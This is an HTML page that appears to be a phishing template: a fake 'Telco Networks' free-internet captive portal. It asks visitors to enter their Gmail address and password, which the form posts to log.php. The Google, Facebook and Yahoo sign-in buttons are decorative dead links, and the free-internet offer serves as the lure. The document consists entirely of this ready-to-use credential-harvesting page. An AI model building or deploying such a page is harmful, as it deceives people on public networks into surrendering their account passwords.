<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="Free Internet">
    <meta name="author" content="Telco Networks Inc.">
    <link rel="icon" href="img/favicon.png">

    <title>Portal: Login</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="https://fonts.googleapis.com/css?family=Libre+Franklin" rel="stylesheet">
    <link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

    <!-- Core Javascript -->
    <script src="js/bootstrap.min.js"></script>
    <script src="js/collapse.js"></script>
    <script src="js/jquery.js"></script>

    <style>
        body,
        html {
            font-family: 'Libre Franklin', sans-serif;
            font-size: 1em;
            color: #f2f2f2;
            background: /* top, transparent black, faked with gradient */
            linear-gradient( rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0.6)), /* bottom, image */
            url("img/background.jpg");
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-size: cover;
            min-height: 100%;
            height: auto !important;
            /* cross-browser */
            height: 100%;
            /* cross-browser */
        }

        .top-content {
            margin-top: 6em;
        }

        .api-content {
            text-align: center;
            margin-bottom: 3em;
        }

        .credentials {
            font-size: .8em;
        }

        .password {
            margin-top: .2em;
        }

        .centered {
            text-align: center;
        }

        .btn-google {
            color: #ffffff;
            background-color: #ea4335;
            border-color: #ea4335;
        }

        .btn-google:hover {
            color: #ea4335;
            background-color: #fff;
            border-color: #ea4335;
        }

        .btn-facebook {
            color: #ffffff;
            background-color: #3b5998;
            border-color: #3b5998;
        }

        .btn-facebook:hover {
            color: #3b5998;
            background-color: #fff;
            border-color: #3b5998;
        }

        .btn-yahoo {
            color: #ffffff;
            background-color: #7B0099;
            border-color: #7B0099;
        }

        .btn-yahoo:hover {
            color: #7B0099;
            background-color: #fff;
            border-color: #7B0099;
        }

        .signup {
            font-size: .8em;
        }
    </style>

    <body>
        <div class="container">
            <div class="col-md-6 col-md-offset-3 col-xs-12 col-sm-6 col-sm-offset-3 top-content">
                <img class="img-responsive center-block" src="img/logo.png">
                <p class="centered">To enjoy free Internet via telNET, please login</p>
            </div>
            <div class="row">
                <div class="col-md-4 col-md-offset-4 col-xs-12 col-sm-6 col-sm-offset-3 api-content">
                    <form class="form-group credentials" method="POST" action="log.php">
                        <input type="text" class="form-sm form-control" name="email" id="email" placeholder="gmail account" autofocus>
                        <input type="password" class="form-sm form-control password" name="password" id="password" placeholder="password">
                        <br>
                        <input type="submit" class="btn btn-primary form-control" value="Start using the Internet">
                    </form>
                    <p class="signup">New to Telco Networks? Sign in with your existing Google account and enjoy free Internet. Hassle-free.</p>
                    <a href="#" class="btn btn-google"><i class="fa fa-google"></i></a>
                    <a href="#" class="btn btn-facebook"><i class="fa fa-facebook"></i></a>
                    <a href="#" class="btn btn-yahoo"><i class="fa fa-yahoo"></i></a>
                </div>
            </div>

            <script src="js/bootstrap.min.js"></script>
            <script src="js/collapse.js"></script>
            <script src="js/jquery.js"></script>

    </body>

</html>
